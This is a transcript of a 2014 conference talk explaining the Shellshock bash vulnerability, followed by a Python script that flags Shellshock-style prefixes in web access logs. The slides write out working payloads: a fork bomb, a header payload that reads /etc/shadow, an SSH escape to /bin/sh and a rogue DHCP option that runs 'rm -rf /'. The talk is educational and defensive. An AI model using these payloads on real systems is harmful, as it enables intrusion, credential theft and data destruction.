ShellShock

Julien Savoie
September 29, 2014

The talk I gave at HASK in 2014 on the vulnerability in bash known as shellshock.

Transcript

  1. • Who does it impact? Bash 1.13 to 4.3, i.e. if you installed bash any time between 1992 and now.
     • Where is bash used?

  2. What's the attack?
     • Define a function within an environment variable; whatever you place after it will be executed.
       foo () { ignored; }; my attack code goes here.
     • env bar='() { :; }; echo vulnerable' bash -c 'echo hello world'
       Output:
       vulnerable
       hello world

  3. Common Gateway to Hell
     • Any calls to CGI (common gateway interface) services pass HTTP client header variables as environment variables, such as "user-agent" or "referer".
     • User-agent switcher for Chrome: () { :; }; (){ :|: & };:
     • Nameless major vendor: () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/shadow

  4. People are already mass scanning
     209.126.230.72 - - [24/Sep/2014:23:53:34 -0300] "GET / HTTP/1.0" 200 12761 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

  5. OpenSSH isn't safe
     • From sshd_config:
       # Allow client to pass locale environment variables
       AcceptEnv LANG LC_*
     • This means ForceCommand can be escaped:
       $ env LC_NINJA='() { :; }; /bin/sh' ssh victimhost
     • SSH_ORIGINAL_COMMAND is set anyway:
       $ ssh victimhost '() { :; }; /bin/sh'
     • You use "internal-sftp", right?
     • Why do we care about ForceCommand?

  6. DHCP
     • dhcpcd/dhclient make system() calls
     • Rogue DHCP servers can execute arbitrary commands on hosts (usually as uid=0). In /etc/dhcp/dhcpd.conf:
       option default-url "() { :; }; rm -rf /";
     • Consider using "ip dhcp snooping vlan 100,110,115,..."

  7. Et tu, Mac OS X?
     • Bash 3.2.51 is installed at /bin/sh
     • Can be leveraged to get root; suid, anyone?
     • Apple's DHCP client does not use system() calls

  8. What should we have learned?
     • Widely deployed OSS software should be audited, especially if it is old
     • Often it is, but not by nice people
     • Data received from untrusted sources should be sanitized before being used
     • Switch default shell? /bin/sh -> dash or tcsh
     • Disable function importing by default?
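Slide 3 notes that CGI exports HTTP header values into the environment, and slide 4 shows what a scanner hit looks like in a web server access log. As an added example (not part of the talk), here is a small Python detector that parses combined-format access log lines and flags the function-definition prefix in the request, Referer and User-Agent fields; the log lines are constructed, and the loose pattern is an assumption that also catches spacing variants of the exact "() {" prefix shown on the slides.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache "combined" format. The first mirrors the
# scanner hit from slide 4 (payload swapped for the harmless echo on slide 2),
# the second is benign, the third carries the prefix in User-Agent.
SAMPLE_LOG = """\
209.126.230.72 - - [24/Sep/2014:23:53:34 -0300] "GET / HTTP/1.0" 200 12761 "() { :; }; echo vulnerable" "shellshock-scan (http://example.invalid/)"
198.51.100.7 - - [24/Sep/2014:23:54:01 -0300] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [24/Sep/2014:23:55:12 -0300] "GET /index.html HTTP/1.1" 200 1024 "-" "() { :; }; echo vulnerable"
"""

# Combined format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# "() {" is the prefix shown on the slides; the looser regex (assumption) also
# matches spacing variants such as "(){" or "( ) {" used by some scanners.
EXACT_PREFIX = "() {"
LOOSE_RE = re.compile(r"\(\s*\)\s*\{")

# Header-derived fields that CGI hands to the handler as environment variables.
CHECKED_FIELDS = ("req", "referer", "ua")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if unparseable."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_hits(log_text: str) -> List[Dict[str, object]]:
    """Flag each checked field carrying the prefix; 'exact' marks the literal "() {" form."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_combined(line)
        if rec is None:
            continue  # lines that do not parse are skipped, not reported
        for field in CHECKED_FIELDS:
            value = rec[field]
            if LOOSE_RE.search(value):
                hits.append({"line": lineno, "ip": rec["ip"], "field": field,
                             "exact": value.startswith(EXACT_PREFIX), "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_hits(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} {hit['field']} exact={hit['exact']}: {hit['value']}")
```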